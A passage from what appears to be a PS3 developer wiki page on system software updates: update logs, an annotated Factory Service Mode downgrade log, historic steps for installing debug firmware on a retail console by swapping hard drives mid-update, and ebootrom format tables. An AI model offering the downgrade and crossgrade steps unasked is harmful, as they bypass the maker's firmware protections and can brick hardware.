/dev_hdd1/PS3UPDATE/data/font/SCE-PS3-VR-R-LATIN2.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-SR-R-LATIN2.TTF, offset = 039200, size = 0x12ee8<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-SR-R-LATIN2.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-MT-B-LATIN.TTF, offset = 04c400, size = 0x12184<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-MT-B-LATIN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-RD-L-LATIN.TTF, offset = 05e800, size = 0x9714<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-RD-L-LATIN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-YG-R-KOR.TTF, offset = 068200, size = 0x79728<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-YG-R-KOR.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-RD-I-LATIN.TTF, offset = 0e1c00, size = 0x9ea4<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-RD-I-LATIN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-RD-BI-LATIN.TTF, offset = 0ebe00, size = 0x9c80<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-RD-BI-LATIN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-RD-LI-LATIN.TTF, offset = 0f5e00, size = 0xa038<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-RD-LI-LATIN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-NR-L-JPN.TTF, offset = 0100200, size = 0x2f0eb4<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-NR-L-JPN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-CP-R-KANA.TTF, offset = 03f1400, size = 0xf27c<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-CP-R-KANA.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-MT-BI-LATIN.TTF, offset = 0400a00, size = 0x13128<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-MT-BI-LATIN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-MT-I-LATIN.TTF, offset = 0413e00, size = 0x133d8<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-MT-I-LATIN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-SR-R-EXT.TTF, offset = 0427400, size = 0x43450<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-SR-R-EXT.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-RD-L-LATIN2.TTF, offset = 046ac00, size = 0xd7fc<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-RD-L-LATIN2.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-SR-R-LATIN.TTF, offset = 0478600, size = 0xd1b0<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-SR-R-LATIN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-NR-R-JPN.TTF, offset = 0485a00, size = 0x2f5c38<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-NR-R-JPN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-YG-B-KOR.TTF, offset = 077ba00, size = 0x78ec8<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-YG-B-KOR.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-NR-R-EXT.TTF, offset = 07f4c00, size = 0x443b8<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-NR-R-EXT.TTF<br /> required patch_name : /dev_flash_002.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc65e5b0, size = 0x280<br /> dir_num = 0<br /> file_num = 3<br /> filename = /dev_flash/data/font/SCE-PS3-SR-R-JPN.TTF, offset = 0200, size = 0x47380c<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-SR-R-JPN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-NR-B-JPN.TTF, offset = 0473e00, size = 0x2d9724<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-NR-B-JPN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-MT-R-LATIN.TTF, offset = 074d800, size = 0x1202c<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-MT-R-LATIN.TTF<br /> required patch_name : /dev_flash_003.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc65ebb0, size = 0x280<br /> dirname = /dev_flash/data/font/SONY-CC/<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SONY-CC/<br /> file_num = 12<br /> filename = /dev_flash/data/font/SCE-PS3-DH-R-CGB.TTF, offset = 0200, size = 0x7d8884<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-DH-R-CGB.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-RD-B-LATIN2.TTF, offset = 07d8e00, size = 0xd328<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-RD-B-LATIN2.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-YG-L-KOR.TTF, offset = 07e6400, size = 0x78f68<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-YG-L-KOR.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-RD-B-LATIN.TTF, offset = 085f600, size = 0x9430<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-RD-B-LATIN.TTF<br /> filename = /dev_flash/data/font/SCE-PS3-VR-R-LATIN.TTF, offset = 0868e00, size = 0x10344<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SCE-PS3-VR-R-LATIN.TTF<br /> filename = /dev_flash/data/font/SONY-CC/k006004ds.ttf, offset = 0879600, size = 0xeb94<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SONY-CC/k006004ds.ttf<br /> filename = /dev_flash/data/font/SONY-CC/e046323ts.ttf, offset = 0888400, size = 0xd960<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SONY-CC/e046323ts.ttf<br /> filename = /dev_flash/data/font/SONY-CC/c041056ts.ttf, offset = 0896000, size = 0x116dc<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SONY-CC/c041056ts.ttf<br /> filename = /dev_flash/data/font/SONY-CC/n023055ms.ttf, offset = 08a7a00, size = 0xb38c<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SONY-CC/n023055ms.ttf<br /> filename = /dev_flash/data/font/SONY-CC/e046323ms.ttf, offset = 08b3000, size = 0xc25c<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SONY-CC/e046323ms.ttf<br /> filename = /dev_flash/data/font/SONY-CC/n023055ts.ttf, offset = 08bf600, size = 0xc9c0<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SONY-CC/n023055ts.ttf<br /> filename = /dev_flash/data/font/SONY-CC/d013013ds.ttf, offset = 08cc200, size = 0x11174<br /> dstname = /dev_hdd1/PS3UPDATE/data/font/SONY-CC/d013013ds.ttf<br /> required patch_name : /dev_flash_004.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc65f1b0, size = 0x280<br /> dir_num = 2<br /> dirname = /dev_flash/vsh/etc/<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/<br /> dirname = /dev_flash/vsh/etc/print/<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/print/<br /> file_num = 11<br /> filename = /dev_flash/vsh/etc/layout_factor_table_720.txt, offset = 0400, size = 0x1ff<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/layout_factor_table_720.txt<br /> filename = /dev_flash/vsh/etc/layout_grid_table_720.txt, offset = 0800, size = 0x3fd5<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/layout_grid_table_720.txt<br /> filename = /dev_flash/vsh/etc/layout_grid_table_1080.txt, offset = 04a00, size = 0x41f6<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/layout_grid_table_1080.txt<br /> filename = /dev_flash/vsh/etc/index.dat, offset = 08e00, size = 0x4f0<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/index.dat<br /> filename = /dev_flash/vsh/etc/layout_factor_table_272.txt, offset = 09600, size = 0x1dd<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/layout_factor_table_272.txt<br /> filename = /dev_flash/vsh/etc/version.txt, offset = 09a00, size = 0x4ce<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/version.txt<br /> filename = /dev_flash/vsh/etc/layout_grid_table_480.txt, offset = 0a200, size = 0x3dc9<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/layout_grid_table_480.txt<br /> filename = /dev_flash/vsh/etc/print/epson.pmd, offset = 0e400, size = 0x7154<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/print/epson.pmd<br /> filename = /dev_flash/vsh/etc/layout_grid_table_272.txt, offset = 015800, size = 0x3df7<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/layout_grid_table_272.txt<br /> filename = /dev_flash/vsh/etc/layout_factor_table_480.txt, offset = 019800, size = 0x1dc<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/layout_factor_table_480.txt<br /> filename = /dev_flash/vsh/etc/layout_factor_table_1080.txt, offset = 019c00, size = 0x1f2<br /> dstname = /dev_hdd1/PS3UPDATE/vsh/etc/layout_factor_table_1080.txt<br /> required patch_name : /dev_flash_005.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc65f7b0, size = 0x280<br /> required patch_name : /dev_flash_006.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc65fdb0, size = 0x280<br /> required patch_name : /dev_flash_007.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc6603b0, size = 0x280<br /> required patch_name : /dev_flash_008.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc6609b0, size = 0x280<br /> required patch_name : /dev_flash_009.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc660fb0, size = 0x280<br /> required patch_name : /dev_flash_010.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc6615b0, size = 0x280<br /> required patch_name : /dev_flash_011.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc661bb0, size = 0x280<br /> required patch_name : /dev_flash_012.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc6621b0, size = 0x280<br /> required patch_name : /dev_flash_013.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc6627b0, size = 0x280<br /> required patch_name : /dev_flash_014.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc662db0, size = 0x280<br /> required patch_name : /dev_flash_015.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc6633b0, size = 0x280<br /> required patch_name : /dev_flash_016.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc6639b0, size = 0x280<br /> required patch_name : /dev_flash_017.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc663fb0, size = 0x280<br /> required patch_name : /dev_flash_018.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc6645b0, size = 0x280<br /> required patch_name : /dev_flash_019.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc664bb0, size = 0x280<br /> required patch_name : /dev_flash_020.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc6651b0, size = 0x280<br /> required patch_name : /dev_flash_021.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc6657b0, size = 0x280<br /> required patch_name : /dev_flash_022.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc665db0, size = 0x280<br /> required patch_name : /dev_flash_023.tar.aa.2015_02_05_034359.spkg_hdr.1<br /> patch found: offset = 0xc6663b0, size = 0x280<br /> setup environment for ps3updater done.<br /> umount game cache<br /> umount game cache success<br /> Unmount:: not call unset_storage_event_handler<br /> UfsSysUinit2:not call ffs_uninitUnmount:: not call free<br /> <br /> Prepare to shutdown .....Going to shutdown.<br /> Stage 2 says hello (load base = 0x8000000000540000, end = 0x8000000000558330) (version = 0104700F)<br /> OK<br /> <br /> ###<br /> ### Software update mode<br /> <br /> mounting the builtin HDD1 : cellFsUtilMount: /dev_hdd1<br /> PROCESS /dev_hdd1/PS3UPDATE/ps3swu.self (01000200) loaded<br /> PROCESS /dev_hdd1/PS3UPDATE/ps3swu.self (01000200_main_ps3swu.self) (01000200) created from parent process:<br /> creating the initial system process : OK<br /> cellFsUtilMount: /dev_flash2<br /> cellFsUtilMount: /dev_flash3<br /> Registry: running in recovery mode<br /> Registry initialization start:............ done<br /> We are originally in region 82<br /> &lt;/pre&gt;<br /> other: http://pastie.org/pastes/10056453/text?key=utexzvyefmddeddktp3og<br /> <br /> == Factory Service Mode - Installation log breakdown ==<br /> Explaination from rms: http://rmscrypt.wordpress.com/2011/02/01/the-downgrade-process/<br /> <br /> Sample logs:<br /> * http://pastebin.com/XhcjfAjw (downgrade 3.66 -&gt; 3.15)<br /> * http://pastebin.com/SAN7Z3Dq (UPL 3.15)<br /> <br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! log !! Explaination !! Notes<br /> |-<br /> | || manufacturing bit detection in Syscon eeprom, manufacturing mode enabled, looking for lv2_diag.self || <br /> |-<br /> | &lt;pre&gt; manufacturing updating start&lt;/pre&gt; || lv2_diag.self initialised || <br /> |-<br /> | &lt;pre&gt;PackageName = /dev_usb000/PS3UPDAT.PUP&lt;/pre&gt; || PUP file used for FSM reinstall on USB root || <br /> |-<br /> | &lt;pre&gt; settle polling interval success&lt;/pre&gt; || || <br /> |-<br /> | &lt;pre&gt; vflash is disabled...<br /> boot from nand flash...&lt;/pre&gt; || NAND system detected, vflash disabled || <br /> |-<br /> | &lt;pre&gt; creating flash regions...<br /> create storage region: (region id = 2)<br /> format partition: (region_id = 2, CELL_FS_IOS:BUILTIN_FLSH1, CELL_FS_FAT)<br /> create storage region: (region id = 3)<br /> format partition: (region_id = 3, CELL_FS_IOS:BUILTIN_FLSH2, CELL_FS_FAT)<br /> create storage region: (region id = 4)<br /> format partition: (region_id = 4, CELL_FS_IOS:BUILTIN_FLSH3, CELL_FS_FAT)<br /> create storage region: (region id = 5)<br /> create storage region: (region id = 6)&lt;/pre&gt; || creating FLASH regions 2, 3, 4, 5, 6 and formatting regions 2, 3, 4 || <br /> |-<br /> | &lt;pre&gt; Initializing<br /> taking a while...<br /> start Updating Proccess<br /> Initialize elapsed time = 61 msec&lt;/pre&gt; || Initializing + Start Updating Proccess || <br /> |-<br /> | &lt;pre&gt; check UPL<br /> Check UPL elapsed time = 34 msec<br /> check Package Size<br /> get package size elapsed time = 8 msec<br /> start Updating Package<br /> Update packages num = 29<br /> Update packages total size = 160699026&lt;/pre&gt; || UPL.xml.pkg from PUP unpkg'ed and read || <br /> |-<br /> | &lt;pre&gt; Update Package Revoke list<br /> read package revoke list package (576 bytes) elapsed = 6 msec<br /> update package revoke list elapsed = 331 msec<br /> Update Package Revoke list done(0x8002f000)&lt;/pre&gt; || RL_FOR_PACKAGE.img copied from PUP to [[Flash#trvk_pkg|trvk_pkg]] || <br /> |-<br /> | &lt;pre&gt; Update Core OS Package<br /> read core os package (5193774 bytes) elapsed = 324 msec<br /> update core os package elapsed = 1965 msec<br /> Update Core OS Package done(0x8002f000)&lt;/pre&gt; || [[CoreOS|Core OS]] package (CORE_OS_PACKAGE.pkg) is unpkg'ed from PUP and written to [[Flash#ros|ros]] || <br /> |-<br /> | &lt;pre&gt; Update VSH Package<br /> sys_memory_container_create() success(id = 0xc0effffe)<br /> Update VSH's package : 1/21<br /> read vsh package (2070 bytes) elapsed = 8 msec<br /> decrypt and verify vsh package elapsed = 23 msec<br /> write vsh package elapsed = 9259 msec<br /> compare vsh package elapsed = 0 msec<br /> Update VSH's package : 2/21<br /> read vsh package (5616383 bytes) elapsed = 351 msec<br /> decrypt and verify vsh package elapsed = 341 msec<br /> write vsh package elapsed = 1725 msec<br /> compare vsh package elapsed = 402 msec<br /> Update VSH's package : 3/21<br /> read vsh package (3357780 bytes) elapsed = 214 msec<br /> decrypt and verify vsh package elapsed = 227 msec<br /> write vsh package elapsed = 2926 msec<br /> compare vsh package elapsed = 312 msec<br /> Update VSH's package : 4/21<br /> read vsh package (5240122 bytes) elapsed = 328 msec<br /> decrypt and verify vsh package elapsed = 309 msec<br /> write vsh package elapsed = 2776 msec<br /> compare vsh package elapsed = 399 msec<br /> Update VSH's package : 5/21<br /> read vsh package (24029 bytes) elapsed = 9 msec<br /> decrypt and verify vsh package elapsed = 24 msec<br /> write vsh package elapsed = 1185 msec<br /> compare vsh package elapsed = 9 msec<br /> Update VSH's package : 6/21<br /> read vsh package (9831317 bytes) elapsed = 599 msec<br /> decrypt and verify vsh package elapsed = 279 msec<br /> write vsh package elapsed = 11830 msec<br /> compare vsh package elapsed = 466 msec<br /> Update VSH's package : 7/21<br /> read vsh package (8662380 bytes) elapsed = 539 msec<br /> decrypt and verify vsh package elapsed = 272 msec<br /> write vsh package elapsed = 16532 msec<br /> compare vsh package elapsed = 474 msec<br /> Update VSH's package : 8/21<br /> read vsh package (8657372 bytes) elapsed = 541 msec<br /> decrypt and verify vsh package elapsed = 361 msec<br /> write vsh package elapsed = 5911 msec<br /> compare vsh package elapsed = 448 msec<br /> Update VSH's package : 9/21<br /> read vsh package (10445426 bytes) elapsed = 635 msec<br /> decrypt and verify vsh package elapsed = 255 msec<br /> write vsh package elapsed = 5408 msec<br /> compare vsh package elapsed = 467 msec<br /> Update VSH's package : 10/21<br /> read vsh package (10252830 bytes) elapsed = 641 msec<br /> decrypt and verify vsh package elapsed = 262 msec<br /> write vsh package elapsed = 8646 msec<br /> compare vsh package elapsed = 476 msec<br /> Update VSH's package : 11/21<br /> read vsh package (9922968 bytes) elapsed = 621 msec<br /> decrypt and verify vsh package elapsed = 252 msec<br /> write vsh package elapsed = 6950 msec<br /> compare vsh package elapsed = 467 msec<br /> Update VSH's package : 12/21<br /> read vsh package (8214459 bytes) elapsed = 505 msec<br /> decrypt and verify vsh package elapsed = 199 msec<br /> write vsh package elapsed = 5843 msec<br /> compare vsh package elapsed = 386 msec<br /> Update VSH's package : 13/21<br /> read vsh package (9428094 bytes) elapsed = 594 msec<br /> decrypt and verify vsh package elapsed = 244 msec<br /> write vsh package elapsed = 5238 msec<br /> compare vsh package elapsed = 442 msec<br /> Update VSH's package : 14/21<br /> read vsh package (7973335 bytes) elapsed = 498 msec<br /> decrypt and verify vsh package elapsed = 346 msec<br /> write vsh package elapsed = 13617 msec<br /> compare vsh package elapsed = 456 msec<br /> Update VSH's package : 15/21<br /> read vsh package (9766737 bytes) elapsed = 603 msec<br /> decrypt and verify vsh package elapsed = 360 msec<br /> write vsh package elapsed = 17267 msec<br /> compare vsh package elapsed = 529 msec<br /> Update VSH's package : 16/21<br /> read vsh package (9199234 bytes) elapsed = 583 msec<br /> decrypt and verify vsh package elapsed = 407 msec<br /> write vsh package elapsed = 23189 msec<br /> compare vsh package elapsed = 689 msec<br /> Update VSH's package : 17/21<br /> read vsh package (7260896 bytes) elapsed = 466 msec<br /> decrypt and verify vsh package elapsed = 286 msec<br /> write vsh package elapsed = 14751 msec<br /> compare vsh package elapsed = 689 msec<br /> Update VSH's package : 18/21<br /> read vsh package (6563380 bytes) elapsed = 422 msec<br /> decrypt and verify vsh package elapsed = 155 msec<br /> write vsh package elapsed = 1906 msec<br /> compare vsh package elapsed = 357 msec<br /> Update VSH's package : 19/21<br /> read vsh package (6092245 bytes) elapsed = 373 msec<br /> decrypt and verify vsh package elapsed = 227 msec<br /> write vsh package elapsed = 1457 msec<br /> compare vsh package elapsed = 405 msec<br /> Update VSH's package : 20/21<br /> read vsh package (9859067 bytes) elapsed = 590 msec<br /> decrypt and verify vsh package elapsed = 238 msec<br /> write vsh package elapsed = 2187 msec<br /> compare vsh package elapsed = 498 msec<br /> Update VSH's package : 21/21<br /> read vsh package (6492084 bytes) elapsed = 419 msec<br /> decrypt and verify vsh package elapsed = 321 msec<br /> write vsh package elapsed = 17509 msec<br /> compare vsh package elapsed = 674 msec<br /> Update VSH Package done(0x8002f000)&lt;/pre&gt; || dev_flash_000.tar.aa.* files from PUP are unpkg'ed to dev_flash || <br /> |-<br /> | &lt;pre&gt; Bul-ray Disc Player Revoke<br /> read bdp revoke package (1904 bytes) elapsed = 23 msec<br /> decrypt and verify bdp revoke package elapsed = 29 msec<br /> write bdp revoke package elapsed = 2240 msec<br /> compare bdprevoke package elapsed = 57 msec<br /> Bul-ray Disc Player Revoke done(0x8002f000)&lt;/pre&gt; || dev_flash3_024.tar.aa.* files from PUP are unpkg'ed to dev_flash3 || <br /> |-<br /> | &lt;pre&gt; Update Program Revoke list<br /> read program revoke list package (704 bytes) elapsed = 7 msec<br /> update program revoke list elapsed = 331 msec<br /> Update Program Revoke list done(0x8002f000)&lt;/pre&gt; || RL_FOR_PROGRAM.img from PUP is copied to [[Flash#trvk_prg|trvk_prg]] || <br /> |-<br /> | &lt;pre&gt; move_2block_status_into_the_region(): region id = 3<br /> rewrite_region() region id = 0x3, start_lba = 0x0, end_lba = 0x4000<br /> rewrite region done (ret = 0x8002f000)<br /> rewrite region elapsed time = 1262 msec<br /> touch_1st_sector_in_block() region id = 0x3, start_lba = 0x0, end_lba = 0x4000<br /> touch_1st_sector() done (ret = 0x8002f000)<br /> touch_1st_sector() elapsed time = 1121 msec<br /> rewrite_region() region id = 0x3, start_lba = 0x0, end_lba = 0x4000<br /> rewrite region done (ret = 0x8002f000)<br /> rewrite region elapsed time = 1262 msec&lt;/pre&gt; || || <br /> |-<br /> | &lt;pre&gt; Update BD firmware<br /> read BD firmware package (1966992 bytes) elapsed = 142 msec<br /> update BD firmware elapsed = 184 msec<br /> read BD firmware package (951040 bytes) elapsed = 78 msec<br /> update BD firmware elapsed = 142 msec<br /> read BD firmware package (951040 bytes) elapsed = 80 msec<br /> update BD firmware elapsed = 13959 msec<br /> Update BD firmware done(0x8002f000)&lt;/pre&gt; || Appropiate [[Bluray_Drive_Firmware|BD firmware]] for that [[Bluray Drive]] is flashed to BD eeprom || <br /> |-<br /> | &lt;pre&gt; Update Multi-Card controller firmware<br /> read MCC package (28636 bytes) elapsed = 25 msec<br /> update MCC elapsed = 24 msec<br /> Update Multi-Card controller firmware done(0x8002f000)&lt;/pre&gt; || If SKU with [[MultiCardReader]] then [[MultiCardReader_Firmware|Multi-Card controller firmware]] is flashed to [[MultiCardReader#SST_39VF010_70-4C-WHE_.28Flash.2C_1Mbit.2C_128K_x8.2C_2.7-3.6V.2C_70ns_TSOP32.29|SST 1mbit Flash]] || <br /> |-<br /> | &lt;pre&gt; Update BlueTooth firmware<br /> read BT package (639368 bytes) elapsed = 62 msec<br /> update BT elapsed = 56 msec<br /> Update BlueTooth firmware done(0x8002f000)&lt;/pre&gt; || [[Bluetooth#Spansion_S99AL008D002_0630DBA_H_.28NOR_Flash_8Mbit_3.3V.29|Bluetooth NOR flash]] is updated with <br /> [[Bluetooth_Firmware|BlueTooth firmware]]<br /> |-<br /> | &lt;pre&gt; Update System controller firmware<br /> read SC patch package (4864 bytes) elapsed = 24 msec<br /> read SC patch package (4864 bytes) elapsed = 24 msec<br /> read SC patch package (4864 bytes) elapsed = 23 msec<br /> Update System controller firmware done(0x8002f000)&lt;/pre&gt; || [[Syscon Hardware]] is updated with appropiate [[System_Controller_Firmware|System controller firmware]] || <br /> |-<br /> | &lt;pre&gt; update package elapsed time = 228361 msec&lt;/pre&gt; || || <br /> |-<br /> | &lt;pre&gt; post processiong...<br /> post processiong done<br /> cleanup update status (ret = 0)&lt;/pre&gt; || || <br /> |-<br /> | &lt;pre&gt; os version = 03.1500<br /> build_version = 38031,20091206&lt;/pre&gt; || || <br /> |-<br /> | &lt;pre&gt; region of core os package = 0x40000000&lt;/pre&gt; || || <br /> |-<br /> | &lt;pre&gt; build_target = CEX-ww<br /> build target id = 0x83&lt;/pre&gt; || || <br /> |-<br /> | &lt;pre&gt; manufacturing updating SUCCESS(0x8002f000)&lt;/pre&gt; || || <br /> |-<br /> | &lt;pre&gt; set product mode (ret = 0)&lt;/pre&gt; || || <br /> |-<br /> | &lt;pre&gt; Total Elapsed time = 230556 msec&lt;/pre&gt; || || <br /> |-<br /> |}<br /> <br /> == old crossgrading Retail/CEX to Debug/DEX ==<br /> '''Note'''&lt;br /&gt;<br /> For this to work your system must be below or at 1.80 for the 1.80 debug update and below or on 2.01 for the 2.15 debug update. Just use the next version up from your current firmware version for the retail update.<br /> <br /> It's not very usefull, esp. nowadays, added for historic reasons<br /> <br /> ===How to install debug firmware on retail PS3===<br /> old source: &lt;span style=&quot;text-decoration: line-through;&quot;&gt;http://www.ps3hax.net/other-misc-tutorials/4808-tutorial-how-install-debug-firmware-retail-ps3-partially-hdd-swap-method.html&lt;/span&gt;<br /> <br /> ====Tools needed====<br /> * 1 PS3 system<br /> * 2 PS3 hard drives that are the same size<br /> * 1 retail firmware upgrade<br /> * 1.80 Or 2.15 debug firmware<br /> <br /> ====Instructions====<br /> <br /> # Format both hard drives on the PS3 system.<br /> # Download a debug PS3 firmware and place it in USB stick, and start the update. This will copy all the debug firmware files to the PS3's HDD-A.<br /> # After copied the PS3 will restart and you will see the normal update menu which prompts you to click the button to start update. Do NOT update your PS3, but power it off.<br /> # Next remove the HDD-A, and place in the second HDD, HDD-B in the PS3.<br /> # Download and copy a retail PS3 firmware to a USB stick.<br /> # Again as before place USB in PS3 and update the PS3 as normal but when you get to the screen where it asks for you to press button, do that but stop when it asks you to AGREE to Terms and Condition Page.<br /> # While the system is still powered on and on the update screen, REMOVE HDD-B, and insert HDD-A.<br /> # After swapping the HDD's continuie to update the PS3 as normal and the PS3 will install the debug PS3 firmware=<br /> # Go to the settings and check firmware version and there you will also see the debugging PS3 options :)<br /> <br /> <br /> <br /> ----<br /> <br /> <br /> == Ancient preproduction / prototype ==<br /> ceb decrypter (works on 0.50.004.r010, may work on others)<br /> <br /> http://pastie.org/private/al9p0vkw3g0lgat2yeazw#4,11<br /> <br /> CEB-201x, DEH-R1030 etc.<br /> <br /> old SDKs contain these binairy files in \cell\target\bootrom, <br /> while knowledge about previous version existance can be revealed by the documentation in \cell\info\old\XXX<br /> <br /> === ebootrom structure ===<br /> ====Header====<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Offset !! Length !! Type !! Information<br /> |-<br /> | 0x0 || 0x4 || unsigned long || Unknown<br /> |-<br /> | 0x4 || 0x4 || unsigned long || File Count<br /> |-<br /> | 0x8 || 0x8 || unsigned long || File Length<br /> |-<br /> | 0x10 || 0x30 * '''File Count''' || '''File Table''' || File Table<br /> |-<br /> |}<br /> ====File Table====<br /> The file table consists of a number of file entries determined by '''File Count''', with the format below:<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Offset !! Length !! Type !! Information<br /> |-<br /> | 0x0 || 0x8 || unsigned long || Data Offset<br /> |-<br /> | 0x10 || 0x8 || unsigned long || Data Length<br /> |-<br /> | 0x20 || 0x20 || unsigned long || Data FileName (see below)<br /> |}<br /> ====Filename IDs====<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! File Entry ID !! Filename<br /> |-<br /> | 0x1 || sdk_version<br /> |-<br /> | 0x2 || version.txt<br /> |-<br /> | 0x3 || ros (''CORE_OS_PACKAGE.pkg'')<br /> |-<br /> | 0x4 || trvk_prg<br /> |-<br /> | 0x5 || trvk_pkg<br /> |-<br /> | 0x6 || nand_update<br /> |-<br /> | 0x7 || bdit_firmware<br /> |-<br /> | 0x8 || bdpt_301r_firmware<br /> |-<br /> | 0x9 || bdpt_303r_firmware<br /> |-<br /> |}<br /> ===== bdit_firmware / bdpt_301r_firmware / bdpt_303r_firmware / nand_update / ros / trvk_pkg / trvk_prg =====<br /> ======Header======<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Offset !! Length !! Type !! Information<br /> |-<br /> | 0x0 || 0x4 || unsigned long || Unknown<br /> |-<br /> | 0x4 || 0x4 || unsigned long || File Count<br /> |-<br /> | 0x8 || 0x8 || unsigned long || File Length<br /> |-<br /> | 0x10 || 0x30 * '''File Count''' || '''File Table''' || File Table<br /> |-<br /> |}<br /> ======File Table======<br /> The file table consists of a number of file entries determined by '''File Count''', with the format below:<br /> {| class=&quot;wikitable&quot;<br /> |-<br /> ! Offset !! Length !! Type !! Information<br /> |-<br /> | 0x0 || 0x8 || unsigned long || Data Offset<br /> |-<br /> | 0x10 || 0x8 || unsigned long || Data Length<br /> |-<br /> | 0x20 || 0x20 || unsigned long || DataName&lt;br /&gt;<br /> * bdit_firmware -&gt; BDIT_FIRMWARE_PACKAGE.pkg<br /> * bdpt_301r_firmware -&gt; BDPT_FIRMWARE_PACKAGE_301R.pkg<br /> * bdpt_303r_firmware -&gt; BDPT_FIRMWARE_PACKAGE_303R.pkg<br /> * trvk_pkg -&gt; RL_FOR_PACKAGE.img<br /> * trvk_prg -&gt; RL_FOR_PROGRAM.img<br /> * ros -&gt; CORE_OS_PACKAGE.pkg<br /> * nand_update -&gt; NAND_UPDATE.pkg.[01]-[28]<br /> |-<br /> | 0x40 || '''Data Length''' || unsigned long || SCE signed package data<br /> |-<br /> |}<br /> ====== 